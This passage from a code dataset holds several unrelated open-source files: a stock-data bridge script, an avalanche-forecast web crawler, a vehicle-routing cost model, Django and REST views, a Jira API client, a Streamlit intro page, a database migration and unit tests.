find_album(cls, name):\n        \"\"\"Find an album by name\"\"\"\n        for alb in cls.lst_albums:\n            if alb.name.lower() == name.lower():\n                return alb\n        return None\n","repo_name":"alenatorgasheva/music","sub_path":"album.py","file_name":"album.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33971115205","text":"\"\"\" Script to test how to interface data between Node and Python\nscript based on https://www.sohamkamani.com/blog/2015/08/21/python-nodejs-comm/\n\nScript expects to receive a json through stdin to determine which actions to take\nand communicates back on stdout\"\"\"\n\n# Imports\nimport json\nimport sys\nimport time  # used by the 'get_trend_attribute' request below to compute look_back\n\nimport frame_reader\nimport update_data\nimport sector_helper\nimport ai\n\nDISTRIBUTION_TYPES = {\n        \"price\" : \"lognorm\",\n        \"high\" : \"lognorm\",\n        \"low\" : \"lognorm\",\n        \"volume\" : \"norm\",\n        \"market_cap\" : \"lognorm\",\n        \"last_close\" : \"lognorm\",\n        \"abs_change\" : \"norm\",\n        \"per_change\" : \"norm\"\n        }\n\nif __name__ == \"__main__\":\n    # Load json arguments passed in from node\n    input_args = json.loads(sys.stdin.readline())\n\n    predictor = ai.Intent_Predictor()\n    log_writer = ai.User_Log_Writer(hooks=[predictor.update_graph])\n\n    response = {}\n    response[\"result\"] = {}\n    response[\"request\"] = input_args\n    response[\"error\"] = {}\n\n    # Init the data frame reader for easy data access\n    try:\n        use_test_data = input_args[\"use_test_data\"].lower() == \"true\"\n    except (KeyError):\n        use_test_data = False\n\n    if use_test_data:\n        reader = frame_reader.Stock_Reader(data_path=\"./data/test_frames\")\n    else:\n        reader = frame_reader.Stock_Reader()\n\n    request_type_understood = False\n    result = -1\n\n    # ------------- Handle each type of request specified in the json ------------------#\n\n    # get current attribute\n    if input_args[\"request_type\"] == \"get_current_attribute\":\n        request_type_understood = True\n\n        if \"ticker\" in input_args:\n            result = reader.get_current_attribute(\n                input_args[\"ticker\"],\n                input_args[\"attribute\"])\n\n            prob = ai.get_likelihood(input_args[\"attribute\"], input_args[\"ticker\"], result,\n                    distribution=DISTRIBUTION_TYPES[input_args[\"attribute\"]], test=use_test_data)\n        elif \"group\" in input_args:\n            if input_args[\"group\"][\"type\"] == \"sector\":\n                result = reader.get_current_sector_attribute(\n                    input_args[\"group\"][\"sector_name\"],\n                    input_args[\"attribute\"])\n\n        if result != -1:\n            response[\"result\"][\"value\"] = result\n            try:\n                response[\"result\"][\"likelihood\"] = prob\n            except NameError:\n                pass\n        elif \"ticker\" in input_args:\n            response[\"error\"][\"message\"] = \"Stock with ticker '\" + \\\n                input_args[\"ticker\"] + \"' was not found\"\n            response[\"error\"][\"type\"] = \"ValueError\"\n        elif \"group\" in input_args:\n            response[\"error\"][\"message\"] = \"Sector with name '\" + \\\n                input_args[\"group\"][\"sector_name\"] + \"' was not found\"\n            response[\"error\"][\"type\"] = \"ValueError\"\n\n    # get attribute from specified time\n    if input_args[\"request_type\"] == \"get_attribute\":\n        request_type_understood = True\n        frame_name = reader.get_closest_frame(input_args[\"start_time\"])\n\n        if \"ticker\" in input_args:\n            result = reader.get_attribute(\n                input_args[\"ticker\"],\n                input_args[\"attribute\"],\n                frame_name)\n        elif \"group\" in input_args:\n            if input_args[\"group\"][\"type\"] == \"sector\":\n                result = reader.get_sector_attribute(\n                    input_args[\"group\"][\"sector_name\"],\n                    input_args[\"attribute\"],\n                    
frame_name)\n \n if result != -1:\n response[\"result\"][\"value\"] = result\n result = -1 # TODO have logging param\n elif \"ticker\" in input_args:\n response[\"error\"][\"message\"] = \"Stock with ticker '\" + \\\n input_args[\"ticker\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n elif \"group\" in input_args:\n response[\"error\"][\"message\"] = \"Sector with name '\" + \\\n input_args[\"group\"][\"sector_name\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n\n # Get attributes of the risers or fallers\n if input_args[\"request_type\"] == \"get_risers_attribute\":\n request_type_understood = True\n\n rising = input_args[\"group\"][\"type\"] == \"risers\"\n result = reader.get_risers_attribute(\n input_args[\"attribute\"],\n input_args[\"group\"][\"quantity\"],\n rising=rising\n )\n\n if result != -1:\n response[\"result\"] = result\n elif \"group\" in input_args:\n response[\"error\"][\"message\"] = \"Sector with name '\" + \\\n input_args[\"group\"][\"sector_name\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n \n # get news on a certain company\n if input_args[\"request_type\"] == \"get_news\":\n request_type_understood = True\n try:\n limit_per_source = int(input_args[\"limit_per_source\"])\n except (KeyError):\n limit_per_source = 10\n\n scraper = update_data.LSE_Reader()\n result = scraper.read_news(input_args[\"ticker\"], limit_per_source)\n \n if result != -1:\n response[\"result\"][\"value\"] = result\n else:\n response[\"error\"][\"message\"] = \"Stock with ticker '\" + \\\n input_args[\"ticker\"] + \"' was not found\"\n response[\"error\"][\"type\"] = \"ValueError\"\n \n \n # Predict the users next request\n if input_args[\"request_type\"] == \"predict_intent\":\n request_type_understood = True\n intent = predictor.predict_intent()\n predicted_request = predictor.intent_to_request(intent)\n response[\"result\"][\"value\"] = predicted_request\n\n # Fit a straight line trend to the specified attribute defaults to week backwards\n if input_args[\"request_type\"] == \"get_trend_attribute\":\n request_type_understood = True\n\n look_back = 604800 # One week in seconds\n try:\n start_time = input_args[\"start_time\"]\n look_back = time.time() - start_time\n except (KeyError):\n pass\n\n result = 1\n grad, y_intercept = ai.fit_trend(input_args[\"attribute\"],\n input_args[\"ticker\"],\n look_back=look_back,\n test=use_test_data)\n\n response[\"result\"][\"gradient\"] = grad\n response[\"result\"][\"y_intercept\"] = y_intercept\n\n\n if not request_type_understood:\n response[\"error\"][\"message\"] = \"Request type '\" + \\\n input_args[\"request_type\"] + \"' was not recognised\"\n response[\"error\"][\"type\"] = \"ValueError\"\n\n\n # If there was no error\n # Log the user request\n if result != -1:\n log_writer.append_request(input_args)\n\n # Send response out on stdout\n print(json.dumps(response))\n","repo_name":"IEavan/SEARLE","sub_path":"modules/analysis/node_interface.py","file_name":"node_interface.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70337731946","text":"###############################################################\n# The crawler that loads avalanche forecast data from SAIS website\n# and update them into the database.\n###############################################################\n\nimport sys\nimport os\nimport re\nimport urlparse\nimport json\nfrom selenium import 
webdriver, common\nfrom time import sleep\n\nimport db_manager\nimport utils\n\n\nclass Crawler:\n \"\"\" The main class generating crawler instances to crawl the SAIS website. \"\"\"\n\n def __init__(self):\n\n #Configure the source API.\n self.__crawlerReportURL = utils.read_config('reportAPI')\n self.__crawlerMapURL = utils.read_config('mapURL')\n self.__crawlerAvalancheURL = utils.read_config('avalancheURL')\n\n if len(self.__crawlerReportURL) == 0:\n raise ValueError(\"Empty report API URL in the configuration file!\")\n\n #Configure the crawler.\n if sys.platform == \"linux2\":\n chromedriver = utils.get_project_full_path() + \"/bin/chromedriver_linux\" #This is the Linux driver.\n else:\n chromedriver = utils.get_project_full_path() + \"/bin/chromedriver_osx\" #Assume it's on OS X otherwise, not using Win.\n os.environ[\"webdriver.chrome.driver\"] = chromedriver\n\n self._crawlerViewDriver = webdriver.Chrome(chromedriver)\n self._crawlerViewDriver.implicitly_wait(4)\n self._crawlerViewDriver.set_page_load_timeout(8)\n\n #Configure the DB interface.\n dbFile = utils.get_project_full_path() + utils.read_config('dbFile')\n self._DBManager = db_manager.CrawlerDB(dbFile)\n\n\n def quit(self):\n \"\"\" Exit the crawler webview driver. \"\"\"\n self._crawlerViewDriver.quit()\n\n\n def crawl_forecasts(self, locations):\n \"\"\" Crawl data of locations in the list. \"\"\"\n\n if len(locations) <= 0:\n return False\n\n #Fetch the report ID source for each location.\n crawlerLocations = []\n for item in locations:\n\n item = str(item)\n if not item.isdigit():\n return False\n\n locationInfo = self._DBManager.select_location_by_id(item)\n crawlerLocations.append([locationInfo[0], locationInfo[2]])\n\n for location in crawlerLocations:\n\n retry_count = 0\n load_success = False\n\n # Attempt to load the page three times, if not working then give up and throw exception.\n while not load_success:\n try:\n self._crawlerViewDriver.get(location[1])\n load_success = True\n except common.exceptions.TimeoutException:\n retry_count += 1\n if retry_count >= 3:\n raise\n\n i = 1\n crawlerReports = []\n\n #Lookup all report IDs until exhaustion.\n while True:\n try:\n crawlerReports.append(int(self._crawlerViewDriver.find_element_by_xpath(\"//ul[@id='report-dates']/li[\" + str(i) + \"]\").get_attribute(\"data-report-id\")))\n i += 1\n except common.exceptions.NoSuchElementException:\n break\n\n #List of lists.\n crawlerData = []\n\n if len(crawlerReports) == 0:\n raise Exception(\"SAISCrawler has failed to obtain any data for this location, likely a network error.\")\n\n for report_id in crawlerReports:\n\n try:\n #Fetch encoded data and its date.\n self._crawlerViewDriver.get(self.__crawlerReportURL + str(report_id))\n crawlerCrURL = self._crawlerViewDriver.find_element_by_xpath(\"//img[@id='cr-img']\").get_attribute(\"src\")\n crawlerCrDate = str(self._crawlerViewDriver.find_element_by_xpath(\"//time[1]\").get_attribute(\"datetime\"))\n except:\n #If the CR URL for that report cannot be loaded.\n crawlerCrURL = None\n\n if crawlerCrURL != None:\n #Wait a little while for throttling.\n sleep(1)\n\n #Parse a compassrose URL, with a integer string on length 32 as forecast data, and three altitude boundaries.\n crawlerParsedURL = urlparse.urlparse(crawlerCrURL)\n crawlerParsedQuery = urlparse.parse_qs(crawlerParsedURL.query)\n\n #Decode the integer string data.\n crawlerParsedForecastData = str(crawlerParsedQuery['val'][0])\n\n #Decode the altitude parameters. They may not always be integers (e.g. 
\"1055m\"), so match first int found.\n crawlerParsedForecastLowerBoundary = re.findall(r'\\d+', str(crawlerParsedQuery['txts'][0]))[0]\n crawlerParsedForecastUpperBoundary = re.findall(r'\\d+', str(crawlerParsedQuery['txte'][0]))[0]\n #In case some reports not setting the middle boundary (found on Report #6095, #6632):\n try:\n crawlerParsedForecastMiddleBoundary = re.findall(r'\\d+', str(crawlerParsedQuery['txtm'][0]))[0]\n except:\n crawlerParsedForecastMiddleBoundary = str((int(crawlerParsedForecastLowerBoundary) + int(crawlerParsedForecastUpperBoundary)) / 2)\n\n #Check that the data is of correct length.\n if len(crawlerParsedForecastData) != 32:\n raise ValueError(\"Invalid forecast data from webpage.\")\n\n #Slice data, order: N, NE, E, SE, S, SW, W, NW.\n crawlerParsedForecastData = [crawlerParsedForecastData[i:i+4] for i in range(0,len(crawlerParsedForecastData),4)]\n crawlerParsedForecastDataList = []\n for data in crawlerParsedForecastData:\n #Primary, Secondary values for lower, upper sectors.\n crawlerParsedForecastDataList.append(((data[0], data[2]), (data[1], data[3])))\n\n #Add all information to the data set.\n crawlerData.append([crawlerCrDate, (crawlerParsedForecastLowerBoundary, crawlerParsedForecastMiddleBoundary, crawlerParsedForecastUpperBoundary), crawlerParsedForecastDataList])\n\n for data in crawlerData:\n self._DBManager.add_forecast(location[0], data[0], data[1], data[2])\n\n\n def crawl_past_avalanches(self):\n \"\"\" Crawl the Avalanche Map for past avalanches.\"\"\"\n\n retry_count = 0\n load_success = False\n\n # Attempt to load the page three times, if not working then give up\n # and throw exception.\n while not load_success:\n try:\n self._crawlerViewDriver.get(self.__crawlerMapURL)\n load_success = True\n except common.exceptions.TimeoutException:\n retry_count += 1\n if retry_count >= 3:\n raise\n\n # Obtain a list of years of record.\n map_options = self._crawlerViewDriver.find_element_by_xpath('//*[@id=\"mapform\"]/select')\n option_values = [i.get_attribute(\"value\") for i in map_options.find_elements_by_tag_name(\"option\")]\n years = []\n for val in option_values:\n if val.isdigit():\n years.append(int(val))\n\n # Grab avalanche records of each year.\n for year in years:\n year_url = self.__crawlerAvalancheURL + str(year)\n sleep(1)\n self._crawlerViewDriver.get(year_url)\n page_scripts = self._crawlerViewDriver.find_elements_by_tag_name('script')\n\n # Locate the correct script containing the markers.\n correct_script = None\n for script in page_scripts:\n script_inner = script.get_attribute(\"innerHTML\")\n if \"var markers = \" in script_inner:\n correct_script = script_inner\n break\n\n if correct_script is None:\n raise Exception(\"SAISCrawler has failed to find markers in \" + str(year) + \", exiting.\")\n\n # Locate the line with the markers.\n marker_line = None\n script_lines = correct_script.split('\\n')\n for line in script_lines:\n line_str = str(line).strip()\n if line_str.startswith('var markers = '):\n marker_line = line_str\n break\n\n if marker_line is None:\n raise Exception(\"SAISCrawler has failed to find the marker line in \" + str(year) + \", exiting.\")\n\n line_start = marker_line.find('[')\n line_end = marker_line.rfind(']')\n marker_line = marker_line[line_start:line_end+1]\n\n try:\n marker_json = json.loads(marker_line)\n except ValueError:\n print(marker_line)\n raise Exception(\"SAISCrawler has failed to load the marker JSON in \" + str(year) + \", exiting.\")\n\n avalanche_records = []\n try:\n for avalanche in 
marker_json:\n avalanche_record = [avalanche['ID'], avalanche['Easting'],\n avalanche['Northing'], avalanche['Date'],\n avalanche['Comments']]\n avalanche_records.append(avalanche_record)\n except KeyError:\n raise Exception(\"SAISCrawler has failed to read the marker JSON in \" + str(year) + \", exiting.\")\n\n new, amended_count = self._DBManager.add_past_avalanches(avalanche_records)\n\n print(\"SAISCrawler: added {} new, amended {} for record year {}.\".format(new, amended_count, year))\n\n return True\n\n\n def crawl_all(self):\n \"\"\" Crawl data for all locations in the database. \"\"\"\n\n self.crawl_forecasts(self._DBManager.select_all_location_id())\n self.crawl_past_avalanches()\n load_success = False\n\n\nif __name__ == \"__main__\":\n forecastCrawler = Crawler()\n forecastCrawler.crawl_all()\n","repo_name":"chongyangshi/AvalancheHazardVisualizer","sub_path":"Backend/SAISCrawler/script/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":10071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69931527467","text":"from typing import List, Dict\nfrom random import randrange\nfrom random import shuffle\nimport numpy as np\n\n\nclass Node:\n index: int\n demand: int\n x: int\n y: int\n\n def __init__(self, index, demand, x, y):\n self.index = index\n self.demand = demand\n self.x = x\n self.y = y\n\n def distance(self, other):\n self_to_c = abs(self.x - other.x)\n c_to_other = abs(self.y - other.y)\n distance = np.sqrt(self_to_c ** 2 + c_to_other ** 2)\n return distance\n\n\nclass VRProblem:\n number_of_trucks: int\n truck_capacity: int\n number_of_nodes: int\n nodes: List[Node]\n node_by_index: Dict[int, Node]\n\n # cost function parameters:\n alpha: int\n beta: int\n route_capacity_limit: int\n route_length_limit: int\n\n def __init__(self, number_of_trucks, truck_capacity, nodes):\n self.number_of_trucks = number_of_trucks\n self.truck_capacity = truck_capacity\n self.number_of_nodes = len(nodes)\n self.nodes = nodes\n\n self.node_by_index = {}\n for node in nodes:\n self.node_by_index[node.index] = node\n\n def set_cost_function_parameters(self, alpha, beta, route_capacity_limit, route_length_limit):\n self.alpha = alpha\n self.beta = beta\n self.route_capacity_limit = route_capacity_limit\n self.route_length_limit = route_length_limit\n\n\nclass VRSolution:\n routes: List[int]\n problem: VRProblem\n update_attempt_counter: int = 0\n cost: float\n cost_clean: float\n\n is_capacity_violated = False\n is_length_violated = False\n\n def __init__(self, problem, routes):\n self.routes = routes\n self.problem = problem\n\n def cost_function(self):\n # solution form:\n # 1 2 0 3 4 0 5 6\n # 0 - route delimiter\n\n total_cost = 0\n total_length_violation = 0\n total_capacity_violation = 0\n\n route_delimiters = [i for i, x in enumerate(self.routes) if x == 0]\n route_delimiters.append(len(self.routes))\n\n current_position = 0\n # enumerating routes:\n for route in range(0, len(route_delimiters), 1):\n if route_delimiters[route] <= len(self.routes):\n route_cost, \\\n route_length_violation, \\\n route_capacity_violation = \\\n self.route_cost_function(current_position, route_delimiters[route])\n\n total_cost += route_cost\n total_length_violation += route_length_violation\n total_capacity_violation += route_capacity_violation\n\n current_position += abs(current_position - route_delimiters[route]) + 1\n\n result = total_cost\n result += self.problem.alpha * total_capacity_violation\n result += 
self.problem.beta * total_length_violation\n\n if total_length_violation > 0:\n self.is_length_violated = True\n\n if total_capacity_violation > 0:\n self.is_capacity_violated = True\n\n self.cost_clean = total_cost\n return result\n\n def route_cost_function(self, route_start, route_end):\n # print(route_start, '--', route_end)\n route_cost = 0\n route_length = 0\n route_capacity = 0\n\n if route_start == route_end:\n return 0, 0, 0\n\n # add distance from the warehouse\n warehouse = self.problem.node_by_index[1]\n first_node = self.problem.node_by_index[self.routes[route_start]]\n route_cost += warehouse.distance(first_node)\n\n for j in range(route_start, route_end, 1):\n node_index = self.routes[j]\n node = self.problem.node_by_index[node_index]\n\n # add distance to the next node in the route\n if j != route_end - 1:\n next_node_index = self.routes[j + 1]\n next_node = self.problem.node_by_index[next_node_index]\n route_cost += node.distance(next_node)\n\n route_length += 1\n route_capacity += node.demand\n\n # add distance to the warehouse\n warehouse = self.problem.node_by_index[1]\n last_node = self.problem.node_by_index[self.routes[route_end - 1]]\n route_cost += warehouse.distance(last_node)\n\n length_violation = abs(self.problem.route_length_limit - route_length)\n capacity_violation = abs(self.problem.route_capacity_limit - route_capacity)\n\n return route_cost, length_violation, capacity_violation\n","repo_name":"pazamelin/ORA_labs","sub_path":"lab5/bees/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17769484458","text":"from django.shortcuts import render\nfrom .models import Home\n\ndef home(request):\n home = Home.objects.filter(title='Home').first().description\n about = Home.objects.filter(title='About').first().description\n products = Home.objects.filter(title='Products').first().description\n\n tags = {\n '<img ': '<div class=\"products\"><img style=\"width:100px;height:auto;\" src=\"',\n '></img>': '\"></img>',\n '<desc>': '<div class=\"desc\">',\n '</desc>': '</div></div>',\n }\n for tag in tags:\n products = products.replace(tag,tags[tag])\n products = products.split('\\n')\n return render(request, 'business/home.html', {'home':home, 'about':about,'products':products})","repo_name":"PRREMIA/prremia-django","sub_path":"business/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23052695631","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import permissions\nfrom rest_framework import filters\nfrom rest_framework.viewsets import ModelViewSet, ReadOnlyModelViewSet\n\nfrom .serializers import (\n GroupSerializer, PostSerializer, CommentSerializer, FollowSerializer\n)\nfrom .permissions import IsAuthorOrReadOnly\nfrom posts.models import Post, Comment, Group\n\n\nclass PostViewSet(ModelViewSet):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n permission_classes = [IsAuthorOrReadOnly, ]\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user)\n\n\nclass CommentViewSet(ModelViewSet):\n serializer_class = CommentSerializer\n permission_classes = [IsAuthorOrReadOnly, ]\n\n def get_queryset(self):\n post = get_object_or_404(Post, id=self.kwargs['post_id'])\n comments = Comment.objects.filter(post=post)\n return comments\n\n def 
perform_create(self, serializer):\n serializer.save(\n author=self.request.user,\n post=get_object_or_404(Post, id=self.kwargs['post_id'])\n )\n\n\nclass FollowViewSet(ModelViewSet):\n serializer_class = FollowSerializer\n permission_classes = [permissions.IsAuthenticated, ]\n filter_backends = (filters.SearchFilter, )\n search_fields = ('user__username', 'following__username')\n\n def get_queryset(self):\n return self.request.user.follower.all()\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n\n\nclass GroupViewSet(ReadOnlyModelViewSet):\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n permission_classes = [IsAuthorOrReadOnly, ]\n","repo_name":"AliaksandrMysleika/api_final_yatube","sub_path":"yatube_api/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15270033458","text":"from datetime import datetime\nfrom typing import List, Generator\n\nimport requests\nfrom django.conf import settings\nfrom pydantic import BaseModel, parse_obj_as\nfrom requests.auth import HTTPBasicAuth\n\nfrom jira.models import JiraIssue, JiraMapping\n\n\ndef get_all_jira_issues() -> list:\n start_at = 0\n total = 0\n issues = []\n while total >= start_at:\n response = requests.get(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/latest/search\",\n {\n \"jql\": f\"project = {settings.JIRA_BOARD} ORDER BY created DESC\",\n \"startAt\": start_at,\n }, # type: ignore\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n )\n assert response.status_code == 200, response.json()\n issues += response.json()[\"issues\"]\n start_at += response.json()[\"maxResults\"]\n total = response.json()[\"total\"]\n assert (\n len(issues) == total\n ), f\"issues={len(issues)}, total={total}, start_at={start_at}\"\n return issues\n\n\nclass CustomField(BaseModel):\n id: str\n name: str\n\n\ndef get_all_jira_custom_fields() -> Generator[CustomField, None, None]:\n response = requests.get(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/2/issue/createmeta?projectKeys={settings.JIRA_BOARD}&expand=projects.issuetypes.fields\",\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n )\n assert response.status_code == 200, response.json()\n issuetypes = response.json()[\"projects\"][0][\"issuetypes\"]\n\n # Nested loop with if, we could parse it better but let's say it's fine for now\n for issuetype in issuetypes:\n for field_id, field in issuetype[\"fields\"].items():\n if field_id.startswith(\"customfield_\"):\n yield CustomField(id=field_id, name=field[\"name\"])\n\n\nclass Status(BaseModel):\n id: int\n name: str\n\n\ndef get_statuses() -> List[Status]:\n response = requests.get(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/2/project/{settings.JIRA_BOARD}/statuses\",\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n )\n assert response.status_code == 200, response.json()\n statuses = response.json()[0][\"statuses\"]\n return parse_obj_as(List[Status], statuses)\n\n\ndef update_selected_field(jira_mapping: JiraMapping, issues: List[JiraIssue]) -> None:\n for issue in issues:\n response = requests.put(\n f\"https://{settings.JIRA_DOMAIN}/rest/api/2/issue/{issue.key}/\",\n json={\n \"fields\": {jira_mapping.selected_field_id: datetime.now().isoformat()}\n },\n auth=HTTPBasicAuth(settings.JIRA_USERNAME, settings.JIRA_TOKEN),\n headers={\"Content-Type\": \"application/json\"},\n )\n assert 
response.status_code == 204\n","repo_name":"BesnardConsultingSAS/jira-automations","sub_path":"backend_automations/jira/jira_client.py","file_name":"jira_client.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29279566911","text":"\"\"\"\nPython program that estimates the value of π\nusing Monte Carlo.\n\nFormula:\nLet p = Area of circle = πr² -> Sum of points in circle\nLet q = Area of square = (2r)² -> Sum of points in square\n\np / q = π / 4 = Sum of points in circle / Sum of points in square\nπ = 4 * (No. of points in circle / No. of points in square)\n\n[https://www.geeksforgeeks.org/estimating-value-pi-using-monte-carlo/]\n\"\"\"\n\nfrom random import uniform\n\n# Estimate the value of π given a sample size n\ndef estimatePi(n: int) -> float:\n numInCircle = 0 # Number of points in the circle\n numTotal = 0 # Number of points total \n\n for i in range(n):\n # Uniformly distributed random (x, y) point in the range [0, 1]\n x, y = uniform(0, 1), uniform(0, 1) \n \n # Distance from origin to the current (x, y) \n dist = (x ** 2) + (y ** 2)\n\n # Increment number of points in the circle\n # if distance <= 1\n if dist <= 1:\n numInCircle += 1\n\n # Increment total points overall\n numTotal += 1\n\n return 4 * (numInCircle / numTotal)\n\nif __name__ == '__main__':\n n = int(input('Enter sample size: '))\n print(f'Estimated value of π: {estimatePi(n)}')","repo_name":"FrostyPqnda/Coding-Projects","sub_path":"Python/EstimatePi.py","file_name":"EstimatePi.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41197576938","text":"from django.urls import include, path\n\nfrom rest_framework import routers\nfrom . 
import views\n\nfrom my_awesome_api.views import AccountViewSet, DestinationViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'people', AccountViewSet)\nrouter.register(r'Destination', DestinationViewSet)\n\nurlpatterns = [\n    path('', include(router.urls)),\n    path('Add_account/',views.add_Account, name='Add-account'),\n    path('add_destination/',views.add_Destination, name='add-Destination'),\n    path('view_account/', views.view_Account, name='view_account'),\n    path('view_destination/', views.view_Destination, name='view_destination'),\n    path('update_account/<int:pk>/', views.update_Account, name='update-Account'),\n    path('update_destination/<int:pk>/', views.update_Destination, name='update-destination'),\n    path('delete_account/delete/<int:pk>', views.delete_Account, name='delete-Account'),\n    path('delete_destination/delete/<int:pk>', views.delete_Destination, name='delete-destination'),\n    path('urls_destination/<int:pk>', views.url_destionation, name='account_detail')\n    \n]","repo_name":"syedpmsa/pythonsource","sub_path":"my_awesome_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17324160336","text":"import streamlit as st\n\ntitle = \"Introduction\"\nsidebar_name = \"Introduction\"\n\ndef run():\n\n    st.title(title)\n\n    st.header('The London Fire Brigade:')\n    st.markdown(\n        \"\"\"\n        - Founded in 1865\n        - 113 fire stations spread across the capital\n        - ~150,000 emergency calls per year\n        - Types of incidents: fires, floods, road traffic collisions\n        \"\"\"\n    )\n\n    st.header('Project goals:')\n    st.markdown(\n        \"\"\"\n        - Model the fire brigade's response time\n        - Possibility of proposing actions to improve the response time:\n            * Opening new fire stations\n            * Reassigning a unit to another station\n        \"\"\"\n    )\n\n    st.header('Methods used')\n    st.markdown(\n        \"\"\"\n        - Data analysis (Pandas, Matplotlib, Seaborn)\n        - Response time modelling with machine learning models (Scikit-Learn)\n        \"\"\"\n    )\n","repo_name":"djdevpro/Soutenance","sub_path":"tabs/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39719731131","text":"\"\"\"automatic_collections\n\nRevision ID: e46b30dd3ff5\nRevises: 9e33fa16ba82\nCreate Date: 2023-02-06 11:44:29.000880\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'e46b30dd3ff5'\ndown_revision = '9e33fa16ba82'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    op.create_table(\n        \"automatic_collection\",\n        sa.Column(\n            'collection_id',\n            sa.Integer,\n            sa.ForeignKey('collections.id', ondelete='CASCADE'),\n            primary_key=True,\n        ),\n        sa.Column(\n            'keyword_query',\n            sa.String,\n        ),\n        sa.Column(\n            'author_query',\n            sa.String,\n        ),\n        sa.Column(\n            'title_query',\n            sa.String,\n        ),\n        sa.Column(\n            'subject_query',\n            sa.String,\n        ),\n        sa.Column(\n            'sort_field',\n            sa.String,\n            sa.CheckConstraint(r\"sort_field IN ('uuid', 'title', 'author', 'date')\"),\n            server_default='uuid',\n            nullable=False,\n        ),\n        sa.Column(\n            'sort_direction',\n            sa.String,\n            sa.CheckConstraint(r\"sort_direction IN ('ASC', 'DESC')\"),\n            server_default='ASC',\n            nullable=False,\n        ),\n        sa.Column(\n            'limit',\n            sa.Integer,\n            
sa.CheckConstraint(r'\"limit\" IS NULL OR \"limit\" > 0'),\n        ),\n    )\n    collection_type = postgresql.ENUM('static', 'automatic', name=\"collection_type\")\n    collection_type.create(op.get_bind(), checkfirst=True)\n    op.add_column(\n        'collections',\n        sa.Column(\n            \"type\",\n            collection_type,\n            server_default=\"static\",\n            nullable=False,\n        ),\n    )\n\n\ndef downgrade():\n    op.drop_column(\"collections\", \"type\")\n    op.drop_table(\"automatic_collection\")\n    collection_type = postgresql.ENUM('static', 'automatic', name=\"collection_type\")\n    collection_type.drop(op.get_bind())\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"migrations/versions/e46b30dd3ff5_automatic_collections.py","file_name":"e46b30dd3ff5_automatic_collections.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"22860632322","text":"from unittest import TestCase\nfrom entities.reimbursement import Reimbursement\nfrom exceptions.invalid_param_exception import InvalidParamError\n\nreimburse: Reimbursement = Reimbursement(500, \"Need help\", \"Sure\")\nreimburse_second: Reimbursement = Reimbursement(1000, \"Also need help\", \"Sure\")\n\n\ndef test_get_amount():\n    assert reimburse.get_amount() == 500\n\n\ndef test_get_reason():\n    assert reimburse.get_reason() == \"Need help\"\n\n\ndef test_get_response():\n    assert reimburse.get_response() == \"Sure\"\n\n\ndef test_get_id():\n    assert reimburse.get_id() == 0\n\n\ndef test_get_owner_id():\n    assert reimburse.get_owner_id() == 0\n\n\ndef test_get_status():\n    assert reimburse.get_status() == 0\n\n\ndef test_set_id():\n    reimburse.set_id(1)\n    assert reimburse.get_id() == 1\n    reimburse.set_id(2)\n    assert reimburse.get_id() == 1\n\n\ndef test_set_owner_id():\n    reimburse.set_owner_id(1)\n    assert reimburse.get_owner_id() == 1  # was get_id(); this test targets the owner id\n    reimburse.set_owner_id(2)\n    assert reimburse.get_owner_id() == 1  # like the id, the owner id can only be set once\n\n\ndef test_set_status():\n    reimburse.set_status(1, -1)\n    assert not reimburse.is_denied()\n    assert reimburse.is_pending()\n    reimburse.set_status(2, 1)\n    assert not reimburse.is_pending()\n    assert reimburse.is_approved()\n    reimburse.set_status(2, -1)\n    assert reimburse.is_approved()\n\n\ndef test_set_response():\n    reimburse.set_response(1, \"I refuse\")\n    assert not reimburse.get_response() == \"I refuse\"\n    reimburse.set_response(2, \"Sure you need it\")\n    assert reimburse.get_response() == \"Sure you need 